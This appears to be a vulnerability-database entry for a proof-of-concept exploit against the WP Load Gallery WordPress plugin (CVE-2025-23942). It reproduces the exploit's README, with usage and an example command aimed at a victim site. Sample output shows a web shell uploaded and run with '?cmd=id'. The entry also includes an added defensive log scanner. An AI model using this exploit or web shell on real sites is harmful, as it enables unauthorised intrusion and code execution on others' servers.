POC details: cef97900be9ccb9d3e61f7055c3c9f3503797d6b

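Related vulnerability
Title: WordPress plugin WP Load Gallery code issue vulnerability (CVE-2025-23942)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin WP Load Gallery version 2.1.6 and earlier contains a code issue vulnerability, which stems from the unrestricted upload of files with dangerous types.
Description
WP Load Gallery <= 2.1.6 - Authenticated (Author+) Arbitrary File Upload
Introduction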
# WP Load Gallery Exploit (CVE-2025-23942)

## 📌 Description
An Unrestricted Upload of File with Dangerous Type vulnerability in NgocCode WP Load Gallery allows uploading a web shell to a web server. This issue affects WP Load Gallery from n/a through 2.1.6.

## ⚠️ Vulnerability Details
- **CVE ID:** CVE-2025-23942
- **Affected Plugin:** WP Load Gallery
- **Affected Versions:** Up to **2.1.6**
- **Vulnerability Type:** **Unrestricted File Upload**
- **Severity:** **Critical (9.1 CVSS)**
- **Attack Vector:** **Authenticated (Author+) Remote Code Execution (RCE)**
- **Patch Available:** ❌ (No official patch yet)

## 🚀 Features of the Exploit
✅ **Automated Exploitation** – Extracts nonce, logs in, and uploads the shell automatically.  
✅ **Version Check** – Confirms if the target is vulnerable before exploitation.  
✅ **Error Handling** – Ensures smooth execution even in case of failures.  
✅ **Session Handling** – Uses persistent session management for authentication.  
✅ **Real-time Feedback** – Provides output at each step.

## 🛠️ Requirements
- Python 3.x
- `requests` module (`pip install requests`)
- A valid **WordPress Author+ account** on the target system

## 🔥 Usage
Run the script with the necessary parameters:
```
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
```
Example:
```bash
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
```

## 📝 Output Example
```
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
```
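
A defender-side check for the artifact shown in the output above, as an added example that is not part of the original README or the exploit script: it scans web-server access logs (combined log format assumed) for requests to PHP-executable files under `/wp-content/uploads/`, a directory meant for uploaded media rather than executable code. The function name, the extension list, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions commonly mapped to the PHP handler (assumption; match your server config).
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Common/combined log format: host ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_php_hits(lines):
    """Return one record per request that targets a PHP file in the uploads tree."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # malformed or non-request line
        url = urlsplit(m["target"])
        path = unquote(url.path)  # decode %xx so an encoded extension is still seen
        if "/wp-content/uploads/" not in path.lower() or not PHP_EXT.search(path):
            continue
        status = int(m["status"])
        hits.append({
            "ip": m["ip"],
            "time": m["ts"],
            "path": path,
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            "status": status,
            "served": 200 <= status < 300,  # 2xx: the server handled the file
        })
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2025:10:01:02 +0000] "GET /wp-content/uploads/2025/02/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2025:10:03:40 +0000] "GET /wp-content/uploads/2025/02/nxploit.php?cmd=id HTTP/1.1" 200 54 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [12/Feb/2025:10:04:11 +0000] "GET /wp-content/uploads/2025/02/gallery.PhP HTTP/1.1" 403 199 "-" "python-requests/2.31.0"',
    '192.0.2.10 - - [12/Feb/2025:10:05:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_upload_php_hits(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to true is the one to triage first; a 403 on the same path indicates that a rule denying PHP execution in the uploads directory is in effect.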

## 📜 Legal Disclaimer
This exploit is intended for **educational and security research purposes only**. Do not use it on systems you do not own or have explicit permission to test. The author is **not responsible** for any misuse of this script. 
( Khaled_alenazi )






File snapshot

```
[4.0K] /data/pocs/cef97900be9ccb9d3e61f7055c3c9f3503797d6b
├── [4.0K] CVE-2025-23942.py
└── [2.9K] README.md

0 directories, 2 files
```